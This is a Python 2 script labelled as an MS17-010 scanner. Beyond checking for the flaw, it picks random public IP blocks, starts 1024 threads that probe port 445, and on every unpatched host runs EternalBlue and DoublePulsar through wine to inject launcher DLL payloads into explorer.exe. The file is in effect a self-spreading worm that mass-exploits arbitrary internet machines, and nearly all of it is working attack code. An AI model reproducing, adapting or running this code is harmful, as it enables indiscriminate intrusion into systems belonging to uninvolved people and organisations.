MS17-010 scanner.py

1. from impacket import smb, smbconnection, nt_errors
2. from impacket.uuid import uuidtup_to_bin
3. from mysmb import MYSMB
4. from impacket import smb
5. from struct import pack
6. import socket
7. import time
8. import socket
9. import threading
10. import random
11. import binascii
12. import time
13. import itertools
14. import os
15.  
16. '''
17. Script for
18. - check target if MS17-010 is patched or not.
19. - find accessible named pipe
20. '''
21.  
22. USERNAME = ''
23. PASSWORD = ''
24.  
25. NDR64Syntax = ('71710533-BEBA-4937-8319-B5DBEF9CCC36', '1.0')
26.  
27. MSRPC_UUID_BROWSER = uuidtup_to_bin(('6BFFD098-A112-3610-9833-012892020162','0.0'))
28. MSRPC_UUID_SPOOLSS = uuidtup_to_bin(('12345678-1234-ABCD-EF00-0123456789AB','1.0'))
29. MSRPC_UUID_NETLOGON = uuidtup_to_bin(('12345678-1234-ABCD-EF00-01234567CFFB','1.0'))
30. MSRPC_UUID_LSARPC = uuidtup_to_bin(('12345778-1234-ABCD-EF00-0123456789AB','0.0'))
31. MSRPC_UUID_SAMR = uuidtup_to_bin(('12345778-1234-ABCD-EF00-0123456789AC','1.0'))
32.  
33. pipes = {
34. 'browser' : MSRPC_UUID_BROWSER,
35. 'spoolss' : MSRPC_UUID_SPOOLSS,
36. 'netlogon' : MSRPC_UUID_NETLOGON,
37. 'lsarpc' : MSRPC_UUID_LSARPC,
38. 'samr' : MSRPC_UUID_SAMR,
39. }
40.  
41. def check(target):
42. conn = MYSMB(target)
43. try:
44. conn.login(USERNAME, PASSWORD)
45. except smb.SessionError as e:
46. print('Login failed: ' + nt_errors.ERROR_MESSAGES[e.error_code][0])
47. return False
48. finally:
49. print('Target OS: ' + conn.get_server_os())
50.  
51. tid = conn.tree_connect_andx('\\\\'+target+'\\'+'IPC$')
52. conn.set_default_tid(tid)
53.  
54.  
55. # test if target is vulnerable
56. TRANS_PEEK_NMPIPE = 0x23
57. recvPkt = conn.send_trans(pack('<H', TRANS_PEEK_NMPIPE), maxParameterCount=0xffff, maxDataCount=0x800)
58. status = recvPkt.getNTStatus()
59. if status == 0xC0000205: # STATUS_INSUFF_SERVER_RESOURCES
60. print('The target is not patched')
61. return True
62. else:
63. print('The target is patched')
64. return False
65.  
66. def exploit(IP):
67. print os.popen("wine Eternalblue-2.2.0.exe --TargetIp " + IP).read()
68. print os.popen("wine Doublepulsar-1.3.1.exe --TargetIp " + IP + " --Function RunDll --DllPayload launcher.x86.dll --ProcessName explorer.exe").read()
69. print os.popen("wine Doublepulsar-1.3.1.exe --TargetIp " + IP + " --Function RunDll --DllPayload launcher.x64.dll --ProcessName explorer.exe").read()
70.  
71. def gen_IP_block():
72. not_valid = [10,127,169,172,192]
73. first = random.randrange(1,256)
74. while first in not_valid:
75. first = random.randrange(1,256)
76. ip = ".".join([str(first),str(random.randrange(1,256)),
77. str(random.randrange(1,256))])
78. return ip+".1-255"
79.  
80. def ip_range(input_string):
81. octets = input_string.split('.')
82. chunks = [map(int, octet.split('-')) for octet in octets]
83. ranges = [range(c[0], c[1] + 1) if len(c) == 2 else c for c in chunks]
84.  
85. for address in itertools.product(*ranges):
86. yield '.'.join(map(str, address))
87. def Scan(IP):
88. try:
89. s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
90. s.settimeout(5)
91. s.connect((IP, 445))
92. s.close()
93. if check(IP):
94. exploit(IP)
95. except Exception as e:
96. pass
97.  
98. def HaxThread():
99. while 1:
100. for IP in ip_range(gen_IP_block()):
101. Scan(IP)
102.  
103.  
104. if __name__ == "__main__":
105. threads = 0
106. for i in range(1024):
107. try:
108. threading.Thread(target=HaxThread, args=()).start()
109. threads+=1
110. except:
111. pass
112. print "[+] Started " + str(threads) + " threads!"